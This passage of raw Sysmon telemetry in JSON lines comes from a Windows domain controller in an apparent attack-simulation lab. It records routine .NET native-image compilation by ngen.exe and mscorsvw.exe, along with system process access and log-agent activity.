work64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8441,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.919\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-00100F1D0F00}\r\nTargetProcessId: 4768\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.919","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-00100F1D0F00}","TargetProcessId":"4768","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8442,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.919\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-00100F1D0F00}\r\nTargetProcessId: 4768\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.919","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-00100F1D0F00}","TargetProcessId":"4768","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8443,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.951\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-001046200F00}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.951","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-001046200F00}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8444,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.951\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-001046200F00}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.951","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-001046200F00}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8445,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.951\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-001046200F00}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.951","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-001046200F00}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8446,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.982\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.982","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8447,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:14.998\r\nProcessGuid: {E2A3D6B1-1376-5F25-0000-001046200F00}\r\nProcessId: 2388\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\954-0\\System.IO.Compression.FileSystem.dll\r\nCreationUtcTime: 2020-08-01 07:02:14.998","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:14.998","ProcessGuid":"{E2A3D6B1-1376-5F25-0000-001046200F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\954-0\\System.IO.Compression.FileSystem.dll","CreationUtcTime":"2020-08-01 07:02:14.998","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8448,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.029\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-0010A2230F00}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.029","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-0010A2230F00}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8449,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.029\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-0010A2230F00}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 